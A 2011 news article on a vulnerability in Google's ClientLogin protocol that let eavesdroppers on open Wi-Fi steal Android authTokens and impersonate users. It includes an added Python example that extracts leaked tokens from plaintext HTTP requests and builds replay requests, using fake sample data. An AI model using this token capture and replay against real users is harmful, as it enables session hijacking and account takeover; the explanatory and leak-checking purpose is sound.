May 17, 2011 11:38 GMT

Security researchers have discovered a vulnerability in Google's ClientLogin authentication protocol which allows potential attackers to execute session hijacking attacks against Android users.

The security hole was identified by researchers from the Institute of Media Informatics of the University of Ulm in Germany and builds on the findings of Rice University professor Dan Wallach.

In February, Mr. Wallach discovered that many Android applications sent data in clear form, a problem on unsecured wireless networks where attackers can freely sniff out traffic.

The Rice University professor concluded that "an eavesdropper can definitely see your calendar transactions and can likely impersonate you to Google Calendar."

"We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis. The short answer is: Yes, it is possible, and it is quite easy to do so," said Bastian Könings, Jens Nickels, and Florian Schaub from the German university.

"Further, the attack is not limited to Google Calendar and Contacts, but is theoretically feasible with all Google services using the ClientLogin authentication protocol for access to its data APIs," they added.

Much like a session cookie in a browser, an Android device that authenticates to Google's services does so once with the account password and receives an authentication token (authToken), which the system's AccountManager stores and hands to apps so that the password does not have to be sent again.

These authTokens are valid for up to two weeks and are not tied to the device or connection that obtained them. Whenever an app sends one over an unencrypted (http) connection, anyone who can eavesdrop on that connection, the classic man-in-the-middle position on an open wireless network, can capture the token and replay it until it expires, just as with a browser session cookie sent over plain http.

This kind of attack is the reason why major websites are pushing for full-session HTTPS. Some have already enabled it by default; the mobile services world, however, is lagging behind.

An attacker who sniffs unencrypted traffic on an open wireless network can extract the authTokens, load them into his own Android device (or any HTTP client able to send the same Authorization header) and act as the victim toward the corresponding Google service for as long as the token remains valid.
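The capture-and-replay described in the two paragraphs above, as an added example written for this page (it is not code from the article or from the Ulm researchers): it scans plaintext HTTP requests for the `Authorization: GoogleLogin auth=...` header that Google Data API clients used with ClientLogin, reports each token leaked in the clear, and constructs the request an attacker would replay from his own device. The sample capture and the token value are constructed for the example; in practice the requests would be reassembled from a pcap taken on the open network, which this block does not do, and nothing here is sent anywhere.

```python
"""Find ClientLogin authTokens leaked over plaintext HTTP and show how they replay.

Added example, not from the original article. The header shape below is the
documented ClientLogin form; the captured requests are constructed samples.
"""
import re
from dataclasses import dataclass

# Value of the Authorization header a ClientLogin client sends to a Google Data API.
GOOGLELOGIN_AUTH = re.compile(r"^GoogleLogin\s+auth=(\S+)$", re.IGNORECASE)


@dataclass(frozen=True)
class LeakedToken:
    host: str
    path: str
    token: str


def parse_http_request(raw: bytes) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def find_leaked_tokens(plaintext_requests: list[bytes]) -> list[LeakedToken]:
    """Return every ClientLogin authToken that appears in a cleartext request.

    Only plaintext (port 80) requests are meaningful input: the same header sent
    inside TLS is not visible to an eavesdropper, which is the whole point of
    the 2.3.4 fix for Calendar and Contacts.
    """
    leaks: list[LeakedToken] = []
    for raw in plaintext_requests:
        _method, path, headers = parse_http_request(raw)
        match = GOOGLELOGIN_AUTH.match(headers.get("authorization", ""))
        if match:
            leaks.append(LeakedToken(headers.get("host", "?"), path, match.group(1)))
    return leaks


def build_replay_request(leak: LeakedToken) -> bytes:
    """Build the request an attacker would send from his own client.

    The token is not bound to the victim's device, so the same header is all
    that is needed; no password is involved. The bytes are returned, not sent.
    """
    return (
        f"GET {leak.path} HTTP/1.1\r\n"
        f"Host: {leak.host}\r\n"
        f"Authorization: GoogleLogin auth={leak.token}\r\n\r\n"
    ).encode()


# Constructed sample capture: one Calendar sync as a pre-2.3.4 device would send
# it over port 80 (fake token value), and one unrelated plaintext request.
CAPTURED = [
    (b"GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
     b"Host: www.google.com\r\n"
     b"Authorization: GoogleLogin auth=DQAAAMEXAMPLEFAKETOKEN\r\n"
     b"User-Agent: Android-GData/1.0\r\n\r\n"),
    (b"GET /weather HTTP/1.1\r\n"
     b"Host: example.org\r\n"
     b"Cookie: session=abc123\r\n\r\n"),
]


if __name__ == "__main__":
    for leak in find_leaked_tokens(CAPTURED):
        print(f"authToken for {leak.host}{leak.path} sent in the clear: {leak.token[:8]}...")
        print(build_replay_request(leak).decode())
```

The same scan is a quick check for any app: if a request with a `GoogleLogin auth=` header shows up in a plaintext capture, that app leaks a reusable credential to everyone on the network; the only host-side defence was moving that request under HTTPS.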

Starting with Android 2.3.4, Google Calendar and Contacts sync use HTTPS by default, but only a very small percentage of devices currently run this version of the operating system. In addition, even on 2.3.4, Picasa sync remains vulnerable to this authToken-stealing attack.